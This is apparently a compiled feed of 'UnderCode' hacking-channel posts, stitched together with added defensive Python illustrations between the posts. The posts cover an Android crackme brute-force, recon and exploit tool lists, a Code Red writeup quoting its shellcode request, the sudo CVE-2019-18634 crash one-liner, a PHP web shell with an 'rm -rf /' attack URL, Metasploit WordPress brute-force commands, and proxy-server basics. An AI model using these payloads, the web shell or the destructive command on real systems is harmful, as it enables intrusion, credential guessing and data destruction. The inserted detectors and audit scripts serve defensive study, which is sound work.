UNDERCODE COMMUNITY
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ NEWS ▄ ▂ ▁


1) We started using Pinterest:
pinterest.com/UndercOdeOfficial


2) After 3 bans at github.com, we decided to get another pro GitHub account:
github.com/UndercOdeOfficial


🦑 Some follows from you would be appreciated 😊
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Android Hacking - Simple algorithm analysis
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

New to Android dynamic debugging, and decided to use

1) First of all, without anti-debugging, he would not pretend to be cut off) Run the apk, enter the verification code, and pop up


2) Then use JEB to analyze the APK file, search for the string "Sorry, Fish!", locate the verification process, and find the verification function EatRice.

3) So in libxy.so, find the function. Dynamic debugging shows that the program first checks whether the first character of the input string is 'X' (0x58), whether the second character is '#' (0x23), and whether the string length is 7. If these conditions are not met, it waits 3s and then returns 0. From this, the verification code format should be "X#-----", where "-" represents a character that is still unknown. The string is referred to as szA below.

4) The debugger shows that the program performs a calculation on szA[1:2], szA[2:3], szA[3:4], szA[4:5] and szA[5:6] in turn and compares each with the corresponding expected result. If all the results match, verification is considered successful.

5) The specific algorithm is not described here; look at the program for it. On to the cracking process. Since the algorithm involves some shifts and feedback, it is difficult to invert (in my opinion). However, the algorithm operates on two characters at a time, and each character is a visible character (0x21 ~ 0x7e). The idea, therefore, is to brute-force the code one character at a time. In this example, when szA[1:2] is calculated, szA[1] = '#' is known, so szA[2] can be brute-forced; when szA[2:3] is calculated, szA[2] is known, so szA[3] can be brute-forced; and so on, until the value of every character has been recovered. The time complexity is also O(1), that is, a maximum of (0x7e-0x21) * 5 = 0x1d1 operations to calculate the answer.

🦑 Other parts will be sent later
Written by UnderCode
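
The position-by-position search from step 5, as an added example that is not code from the original post. The real libxy.so routine is not shown on this page, so `pair_check` is a hypothetical stand-in with a shift and feedback from the previous character; only the "X#-----" format and the chained pairs come from the text.

```python
# Added illustration: why a check that validates overlapping character pairs
# one after another can be searched one position at a time.
# pair_check() is a HYPOTHETICAL stand-in; the real routine is not on the page.

PRINTABLE = range(0x21, 0x7F)      # visible characters 0x21..0x7e inclusive
PREFIX = "X#"                      # fixed by the format check described above
LENGTH = 7


def rotl8(value, bits):
    """Rotate an 8-bit value left."""
    return ((value << bits) | (value >> (8 - bits))) & 0xFF


def pair_check(prev, cur):
    """Toy per-pair transform: the previous character feeds into the result."""
    return (rotl8(cur ^ prev, 3) + (prev >> 1)) & 0xFF


def expected_values(code):
    """Values the verifier would compare against for szA[1:2] .. szA[5:6]."""
    return [pair_check(ord(code[i]), ord(code[i + 1]))
            for i in range(1, LENGTH - 1)]


def recover(targets):
    """Search each unknown position separately, keeping every consistent prefix.

    Returns (candidate codes, number of pair_check evaluations).
    """
    evaluations = 0
    partial = [PREFIX]
    for target in targets:
        extended = []
        for prefix in partial:
            for cur in PRINTABLE:
                evaluations += 1
                if pair_check(ord(prefix[-1]), cur) == target:
                    extended.append(prefix + chr(cur))
        # More than one survivor is possible when the transform is not
        # one-to-one; all of them are carried to the next position.
        partial = extended
    return partial, evaluations


if __name__ == "__main__":
    secret = "X#k9!Qz"             # constructed sample code, not from the app
    codes, cost = recover(expected_values(secret))
    print(codes, cost, "evaluations instead of", len(PRINTABLE) ** 5)
```

The cost grows with the number of positions rather than with the number of possible codes, which is what a chained per-pair comparison gives away.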
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TOPIC HACKERS SCRIPTS - KALI - TERMUX at GITHUB
Twitter.com/UndercOdeTC

🦑 Active Intelligence Gathering

1) EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. https://github.com/ChrisTruncer/EyeWitness

2) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot. https://github.com/jordanpotti/AWSBucketDump

3) AQUATONE is a set of tools for performing reconnaissance on domain names. https://github.com/michenriksen/aquatone

4) spoofcheck is a program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. https://github.com/BishopFox/spoofcheck

5) Nmap is used to discover hosts and services on a computer network, thus building a "map" of the network. https://github.com/nmap/nmap
dnsrecon is a DNS enumeration script. https://github.com/darkoperator/dnsrecon

6) dirsearch is a simple command line tool designed to brute force directories and files in websites. https://github.com/maurosoria/dirsearch

7) Sn1per is an automated pentest recon scanner. https://github.com/1N3/Sn1per

8) Social Mapper is an OSINT social media mapping tool that takes a list of names & images (or a LinkedIn company name) and performs automated target searching on a huge scale across multiple social media sites. It is not restricted by APIs, as it instruments a browser using Selenium. It outputs reports to aid in correlating targets across sites. https://github.com/SpiderLabs/social_mapper

9) skiptracer is an OSINT scraping framework that utilizes some basic Python web scraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget. https://github.com/xillwillx/skiptracer

10) FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents it scans. https://github.com/ElevenPaths/FOCA

11) theHarvester is a tool for gathering subdomain names, e-mail addresses, virtual hosts, open ports/banners, and employee names from different public sources. https://github.com/laramies/theHarvester

12) Metagoofil is a tool for extracting metadata of public documents (pdf, doc, xls, ppt, etc.) available in the target websites. https://github.com/laramies/metagoofil

E N J O Y
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Dangerous Virus Code Red (computer worm)
> server attack
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.

2) The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh when it exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.

🦑 Exploited vulnerability

3) The worm showed a vulnerability in the growing software distributed with IIS, described in Microsoft Security Bulletin MS01-033,[3] for which a patch had been available a month earlier.

4) The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated letter 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine with the worm. Kenneth D. Eichman was the first to discover how to block it, and was invited to the White House for his discovery.

🦑 Worm payload:

5) The payload of the worm included:

> Defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By xy

6) Other activities based on day of the month:

> Days 1-19: Trying to spread itself by looking for more IIS servers on the Internet.

> Days 20–27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[2]

> Days 28-end of month: Sleeps, no active attacks.

7) When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interpreted this string as computer instructions, propagating the worm.

Powered by wiki
Posted On UndercOde
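
Detection logic for the log entries quoted in point 7, as an added example that is not part of the original post. The log lines are constructed (documentation IP addresses), the 64-character filler threshold is an assumption, and matching any repeated filler character rather than only 'N' goes beyond what the post describes.

```python
# Added illustration: flag Code Red style requests in web server access logs.
import re
from collections import Counter

# Common Log Format, up to and including the status code.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
U_ESCAPE_RE = re.compile(r"%u[0-9a-fA-F]{4}")
MIN_FILLER = 64   # assumed threshold for "one character repeated abnormally"


def inspect_target(target):
    """Return details if the request target has the overflow shape, else None."""
    path, _, query = target.partition("?")
    if not path.lower().endswith(".ida"):
        return None
    # The query must open with a long run of a single repeated character ...
    filler = re.match(r"(.)\1{%d,}" % (MIN_FILLER - 1), query)
    if filler is None:
        return None
    # ... followed by %uXXXX sequences, the encoded bytes after the last 'N'.
    escapes = U_ESCAPE_RE.findall(query[filler.end():])
    if not escapes:
        return None
    return {"path": path, "filler_char": filler.group(1),
            "filler_len": filler.end(), "u_escapes": len(escapes)}


def scan(lines):
    """Return one finding per matching log line, with client and status."""
    findings = []
    for number, line in enumerate(lines, 1):
        entry = LOG_RE.match(line)
        if entry is None:
            continue
        details = inspect_target(entry.group("target"))
        if details:
            details.update(line=number, client=entry.group("client"),
                           status=int(entry.group("status")))
            findings.append(details)
    return findings


def infected_sources(findings):
    """Each client sending this request is itself an infected host."""
    return Counter(f["client"] for f in findings)


# Constructed sample log; the %u values are taken from the entry quoted above.
PROBE = "/default.ida?" + "N" * 224 + "%u9090%u6858%ucbd3%u7801%u00=a"
SAMPLE_LOG = [
    f'203.0.113.7 - - [19/Jul/2001:14:02:11 +0000] "GET {PROBE} HTTP/1.0" 404 205',
    '198.51.100.4 - - [19/Jul/2001:14:02:15 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.9 - - [19/Jul/2001:14:03:40 +0000] "GET /search.ida?q=NNNN HTTP/1.0" 404 205',
    f'192.0.2.55 - - [19/Jul/2001:14:05:02 +0000] "GET {PROBE} HTTP/1.0" 404 205',
    f'203.0.113.7 - - [19/Jul/2001:14:09:30 +0000] "GET {PROBE} HTTP/1.0" 404 205',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(infected_sources(hits).most_common())
```

Because the worm did not check what it was talking to, a 404 on a non-IIS server still identifies the sender as infected; the status field matters mainly on IIS hosts.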
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 news from twitter.com/UndercOdeTC
> XRed virus attack on a company's (especially in Europe) remote office during the holiday season

1) Tencent Enterprise Security Emergency Response Center (hereinafter referred to as Tencent Security) received a request from an Internet company.
> A remote business tool and a spreadsheet file shared within one of the company's internal work groups were found to be infected with a virus, causing more than 200 employees' computers in the department to be infected. The company was concerned that the security of its business systems was threatened.

🦑 Troubleshoot the source of virus infection:

1) The company's early internal investigation: the company's network administrator noticed that the exe file of the remote office tool in the compressed package shared by an employee through the internal working group was infected, whereas the remote office tool exe provided by the company was a normal file. Therefore, the source of virus transmission is basically confirmed.

2) A Tencent security engineer conducted a remote investigation and found that the computer suspected of being infected showed the following phenomena:

a) When a file is unzipped on this computer, the uncompressed exe file is larger than the original file and has been infected.

b) When any exe file is copied to the desktop, the exe file is infected. After the infection, the file description is changed to that of a touchpad device driver. Based on this, it can be basically confirmed that the virus is the "Synaptics" worm that has been disclosed by peers.

c) Continued inspection of the cracked version of the compression software on this infected computer did not find any “supply chain pollution” issues. It can basically be confirmed that this personal computer was infected with the XRed virus some time earlier. During this emergency, it was used as a work computer for remote office use. When it shared files externally, the company's IT staff monitored this and found the anomaly.

@UndercOdeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Third, block virus transmission and repair programs:
(specific to the X-Red virus)
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The company's IT staff immediately disconnected the infected machine from the network to prevent further spread.

2) After confirming that the computer housekeeper Cloud Master Defense can intercept the pathogen "Synaptics.exe", the company immediately required computers without the "Tencent T-sec Terminal Security Management System" installed to install Tencent Computer Housekeeper.

3) The pathogen "Synaptics.exe" has more than 20,000 variants. The latest update was January 2020.

4) It is still active, and companies are advised to upgrade their anti-virus software in time as a precaution.

5) For infected computers, use Tencent Computer Manager (or Tencent T-sec Terminal Security Management System) to conduct a comprehensive check and repair the infected files. The XRed virus infection method is relatively unusual (for details, please refer to the "Detailed Analysis of Samples" section below). Tencent Computer Butler can accurately identify it, repair it perfectly, and restore the infected file to its original state.

@UndercOdeTesting
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Everyone should beware of the X-RED malware; its activity started in Jan 2020
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Vulnerability from twitter.com/UndercOdeTC
> Sudo vulnerability allows unprivileged Linux and macOS users to run commands as root

Author: @UndercOdeOfficial Date: 2020-02-04 Category: security alerts, vulnerability events


> Apple security expert Joe Vennix has discovered a vulnerability (CVE-2019-18634) that allows unprivileged Linux and macOS users to run commands as root.

> This vulnerability can only be exploited in special configurations.

> The vulnerability can only be exploited if the "pwfeedback" option has been enabled in the sudo configuration file. The pwfeedback option for root allows visual feedback when the user enters a password.

> Experts point out that this vulnerability can be triggered even if the user is not in the sudoers file.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) "You do not need root privileges to trigger this vulnerability, you just need to enable pwfeedback." Sudo developer Todd C. Miller wrote.

2) "When entering the password, you can enter sudo through the pipe to reproduce it. For example:"

$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
Password: Segmentation fault

There are two reasons for this vulnerability:

3) The pwfeedback option is generally not ignored when reading from devices other than the terminal device. Due to the lack of a terminal, the version of the line erase character is always an initial value of 0.
If there is a write error, the code that erases the asterisk line will not reset the buffer position correctly, but it will reset the remaining buffer length. This will cause the getln() function to write outside the buffer."

4) If this option is enabled, you can change "Defaults pwfeedback" to "Defaults !pwfeedback" in the sudoers file.

5) The sudo maintainers released version 1.8.31.

"Although there are logic errors in the 1.8.26 to 1.8.30 versions of sudo, the vulnerabilities could not be exploited due to changes in EOF processing after 1.8.26." Miller explained.

6) In October 2019, Vennix discovered a sudo bypass issue: even if the "sudoers configuration" does not allow root access, a malicious user or malicious program can still execute arbitrary commands as the root user on the target Linux system. This bug was patched in UnderCode OS today and in Debian yesterday.

Written by UndercOde
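
A configuration audit for the condition described above, as an added example (not sudo project code). It takes the output of `sudo -V` and the sudoers text as strings and uses only the version facts stated in this post; treating pwfeedback as off when no Defaults line sets it is an assumption about the build's default, and included files are not followed.

```python
# Added illustration: audit a host for the pwfeedback condition (CVE-2019-18634).
import re

FIXED = (1, 8, 31)        # release named above as the fix
EOF_CHANGE = (1, 8, 26)   # 1.8.26-1.8.30: logic error present, not exploitable

# "Defaults", optionally bound to a user/host/runas/command, then a parameter list.
DEFAULTS_RE = re.compile(r"^Defaults([:@>!]\S+)?\s+(.*)$")


def parse_version(text):
    """Pull (major, minor, patch) out of e.g. 'Sudo version 1.8.21p2'."""
    found = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if found is None:
        raise ValueError("no sudo version in %r" % text)
    return tuple(int(part) for part in found.groups())


def logical_lines(sudoers_text):
    """Join backslash continuations and drop comments and blank lines."""
    pending = ""
    for raw in sudoers_text.splitlines():
        line = pending + raw
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        pending = ""
        line = re.sub(r"(^|\s)#.*$", "", line).strip()
        if line:
            yield line


def pwfeedback_scopes(sudoers_text):
    """Map each Defaults scope to the last pwfeedback value set for it."""
    state = {}
    for line in logical_lines(sudoers_text):
        entry = DEFAULTS_RE.match(line)
        if entry is None:
            continue
        scope = entry.group(1) or "global"
        for param in entry.group(2).split(","):
            param = param.strip()
            if param.lstrip("! ").split("=", 1)[0].strip() == "pwfeedback":
                state[scope] = not param.startswith("!")   # last entry wins
    return state


def assess(version_text, sudoers_text):
    """Return (status, scopes where pwfeedback is enabled)."""
    version = parse_version(version_text)
    scopes = pwfeedback_scopes(sudoers_text)
    enabled = sorted(scope for scope, on in scopes.items() if on)
    if not enabled:
        return "not-exposed", enabled     # option off: the bug cannot be reached
    if version >= FIXED:
        return "patched", enabled
    if version >= EOF_CHANGE:
        return "latent", enabled          # upgrade anyway, per Miller's note
    return "vulnerable", enabled          # upgrade or set "Defaults !pwfeedback"


# Constructed sudoers fragment for the demonstration.
SAMPLE_SUDOERS = (
    "# local policy\n"
    "Defaults env_reset, \\\n"
    "         pwfeedback   # show asterisks\n"
    "Defaults:alice !pwfeedback\n"
    "root ALL=(ALL:ALL) ALL\n"
)

if __name__ == "__main__":
    print(assess("Sudo version 1.8.21p2", SAMPLE_SUDOERS))
```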
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TOP EXTREMELY DANGEROUS HACKING TOOLS / accounts-cards-modding... TERMUX-KALI-PARROT...

> EXPLOIT TOOLS 2019-2020
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) WinRAR Remote Code Execution Proof of Concept exploit for CVE-2018-20250. https://github.com/WyAtu/CVE-2018-20250

2) Composite Moniker Proof of Concept exploit for CVE-2017-8570. https://github.com/rxwx/CVE-2017-8570

3) Exploit toolkit CVE-2017-8759 is a handy Python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. https://github.com/bhdresh/CVE-2017-8759

4) CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. https://github.com/unamer/CVE-2017-11882

5) Adobe Flash Exploit CVE-2018-4878. https://github.com/anbai-inc/CVE-2018-4878

6) Exploit toolkit CVE-2017-0199 is a handy Python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. https://github.com/bhdresh/CVE-2017-0199

7) demiguise is an HTA encryption tool for RedTeams. https://github.com/nccgroup/demiguise

8) Office-DDE-Payloads collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

9) CACTUSTORCH Payload Generation for Adversary Simulations. https://github.com/mdsecactivebreach/CACTUSTORCH

10) SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. https://github.com/mdsecactivebreach/SharpShooter

11) Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. https://github.com/Mr-Un1k0d3r/DKMC

12) Malicious Macro Generator Utility is a simple utility designed to generate obfuscated macros that also include an AV / sandbox escape mechanism. https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator

13) SCT Obfuscator Cobalt Strike SCT payload obfuscator. https://github.com/Mr-Un1k0d3r/SCT-obfuscator

14) Invoke-Obfuscation PowerShell Obfuscator. https://github.com/danielbohannon/Invoke-Obfuscation

15) Invoke-CradleCrafter PowerShell remote download cradle generator and obfuscator. https://github.com/danielbohannon/Invoke-CradleCrafter

16) Invoke-DOSfuscation cmd.exe Command Obfuscation Generator & Detection Test Harness. https://github.com/danielbohannon/Invoke-DOSfuscation

17) morphHTA Morphing Cobalt Strike's evil.HTA. https://github.com/vysec/morphHTA

18) Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. https://github.com/trustedsec/unicorn

U S E FOR Learning Only !!!!
@UndercOdeOfficial
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hacking an Ubuntu Linux System with PHP :
instagram.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> In this practical scenario, we provide basic information on how PHP can be used to compromise Linux.
> We will not target any victims. If you want to try it out, you can install LAMPP on your local computer.

1) PHP comes with two functions that can be used to execute Linux commands: exec() and shell_exec(). The function exec() returns the last line of the command output, while shell_exec() returns the entire result of the command as a string.

2) For demonstration purposes, let us assume that the attacker uploads the following file to a web server.

<?php
// Take the command from the "cmd" GET parameter; default to "ls -l"
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "execute a shell command:-> $cmd </br>";
// Run it through the shell and print everything it returned
$output = shell_exec($cmd);
echo "<pre> $output </pre>";
?>

The script above gets the command from the GET variable named cmd. The command is executed using shell_exec() and the result is returned in the browser. The code can be reached using the following URL: http://localhost/cp/konsole.php?cmd=ls%20-l


3) "...konsole.php?cmd=ls%20-l" assigns the value ls -l to the variable cmd.
The command executed against the server will be

4) See That Picture By UndercODE

> The above command only shows the files and permissions in the current directory.
Assume the attacker passes the command

rm -rf /

Here,
"rm" deletes files
"-rf" makes the rm command run in recursive mode, deleting all folders and files
"/" instructs the command to start deleting files from the root directory
The attack URL looks like this:
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

written by UndercOde
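
A heuristic source scan for files shaped like the konsole.php script above, as an added example that is not part of the original post. It flags request input that reaches a command-execution function, directly or through an intermediate variable; the sink list beyond exec() and shell_exec() and the second sample file are additions made here.

```python
# Added illustration: find PHP code where request input reaches a shell call.
import re

SOURCE_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
VAR_RE = re.compile(r"\$[A-Za-z_]\w*")
# "$name = expression;" but not "==" comparisons or "=>" array pairs.
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?![=>])\s*([^;]*);")
# exec() and shell_exec() are the two named in the text; the others are
# further PHP functions that start a process. The lookbehind skips
# look-alikes such as curl_exec() and $pdo->exec().
SINK_RE = re.compile(
    r"(?<![\w$>:])(exec|shell_exec|system|passthru|popen|proc_open)"
    r"\s*\(([^;]*)\)"
)


def is_tainted(expression, tainted):
    """True if the expression uses request data or a variable derived from it."""
    if SOURCE_RE.search(expression):
        return True
    return any(name in tainted for name in VAR_RE.findall(expression))


def find_command_injection(php_source):
    """Return [(line, function, argument text)] for sink calls fed by a request."""
    tainted = set()
    changed = True
    while changed:                     # repeat until no new variable is tainted
        changed = False
        for name, expression in ASSIGN_RE.findall(php_source):
            if name not in tainted and is_tainted(expression, tainted):
                tainted.add(name)
                changed = True
    findings = []
    for call in SINK_RE.finditer(php_source):
        if is_tainted(call.group(2), tainted):
            line = php_source.count("\n", 0, call.start()) + 1
            findings.append((line, call.group(1), call.group(2).strip()))
    return findings


# The script from the post above.
KONSOLE_PHP = """<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "execute a shell command:-> $cmd </br>";
$output = shell_exec($cmd);
echo "<pre> $output </pre>";
?>"""

# Constructed benign counterpart: fixed command, no request input involved.
STATUS_PHP = """<?php
$report = shell_exec('uptime');
$rows = $db->exec("DELETE FROM sessions WHERE expired = 1");
echo "<pre> $report </pre>";
?>"""

if __name__ == "__main__":
    for label, source in (("konsole.php", KONSOLE_PHP), ("status.php", STATUS_PHP)):
        print(label, find_command_injection(source))
```

The scan ignores statement order and sanitising functions, so each finding is a lead for manual review of the file rather than a verdict.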
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Web Hacking / WordPress - Brute force attack using Metasploit
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) This module will test WordPress logins on a series of computers and report successful logins.

2) If you have loaded the database plugin and connected to a database, this module will log successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4
msf auxiliary(wordpress_login_enum) > set rport 80
msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt
msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt
msf auxiliary(wordpress_login_enum) > exploit

The WordPress brute force reports a successful login with bitnami as both the username and the password.

written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is a proxy server
twitter.com/UndercOdeTC

In a TCP/IP network, the traditional communication process is this:

1) The client requests data from the server, and the server transmits the response data to the client upon request.

2) After the introduction of a proxy server, the process becomes this: the client initiates a request to the server, and the request is sent to the proxy server. The proxy server analyzes the request and first checks whether the requested data is in its cache. If it is, the data is transferred directly to the client; if not, the proxy server makes a request to the server on behalf of the client.

3) After the server responds, the proxy server transmits the response data to the client, while keeping a copy of the data in its own cache. In this way, when another client requests the same data, the proxy server can directly transmit the data to the client without having to initiate a request to the server.

written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Features Of Proxy Server :
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Generally speaking, the proxy server has the following features:

1) Increase access speed by caching

> With the rapid development of the Internet, network bandwidth is becoming increasingly scarce. Therefore, in order to improve access speed, many ISPs provide proxy servers and use the cache function of the proxy server to speed up network access. Generally speaking, most proxy servers support HTTP caching, and some proxy servers also support FTP caching. When choosing a proxy server, HTTP caching alone is sufficient for most organizations.
Caches are generally classified as active caches and passive caches. With a passive cache, the proxy server caches the data returned by the server only when a client requests data. If the data has expired and a client requests the same data, the proxy server must initiate a new data request, and it caches the data again while transmitting the response to the client. With an active cache, the proxy server continuously checks the data in its cache. Once the data expires, the proxy server actively initiates a new data request to update it. In this way, when a client requests the data, the response time is greatly reduced. It should also be noted that most proxy servers do not cache the authentication information in the data.

2) Provide a method for accessing the Internet with a private IP
IP addresses are valuable resources that are not renewable. If you have only a limited number of IP addresses but need to provide Internet access for the entire organization, you can achieve this by using a proxy server.

3) Improve network security
This is straightforward: if all internal users access the Internet through a proxy server, the proxy server becomes the only channel to the Internet. Conversely, the proxy server is also the only channel from the Internet into the internal network. If you do not run a reverse proxy, then to hosts on the Internet only the proxy server is visible out of your entire intranet, which greatly enhances the security of the network.

written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Classification and characteristics of the proxy server :
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Proxy servers are usually classified by implementation mechanism into circuit-layer proxies, application-layer proxies, intelligent circuit-layer proxies, and so on. Here, I want to start from another angle and divide proxy servers into traditional proxy servers and transparent proxy servers.

1) The biggest gain from reading this article is that I have a clear understanding of the implementation methods of intranet access to the extranet and extranet access to the intranet.

> The so-called intranet here refers to an internal network using private IP addresses.

2) Our examples are based on the following assumptions:
your domain name is sample.com, and your intranet (192.168.1.*) users access the Internet through the proxy server proxy.sample.com (external interface eth0: 1.2.3.4; internal interface eth1: 192.168.1.1).

3) In other words, the proxy server is the only machine directly connected to both the Internet and the intranet. It is assumed that some proxy server software (such as squid) is running on the proxy server. Assume that a client in the intranet is client.sample.com (192.168.1.100).

+------------------------+
| Intranet (192.168.1.*) |  eth1 +-------+ eth0      DDN
|                        +-------| proxy |<================> Internet
| client 192.168.1.100   |       +-------+
+------------------------+

eth0: 1.2.3.4
eth1: 192.168.1.1

written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Traditional proxy example: configuration and application of a proxy server
pinterest.com/UndercodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑 Based on the above, we do the following:

1) The proxy service software is bound to port 8080 of the proxy server.

2) The client browser is configured to use port 8080 of the proxy server.

3) The client does not need to configure DNS.

4) A proxy server needs to be configured on the proxy server.

5) The client does not need to configure a default route.

🦑 When we open a web request in the client browser, such as "http://www.yourdomain.com", the following events occur in succession:

1) The client uses a certain port (such as 1025) to connect to port 8080 of the proxy server and requests the web page "http://www.yourdomain.com".

2) The proxy server requests "www.yourdomain.com" from the DNS to get the corresponding IP address 202.99.11.120. Then, the proxy server uses a certain port (such as 1037) to initiate a web connection request to port 80 of the IP address, requesting a web page.

3) After receiving the response web page, the proxy server transmits the data to the client.

4) The client browser displays the page.

From the perspective of www.yourdomain.com, the connection is established between port 1037 at 1.2.3.4 and port 80 at 202.99.11.120. From the client's perspective, the connection is established between port 1025 at 192.168.1.100 and port 8080 at 1.2.3.4.

written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁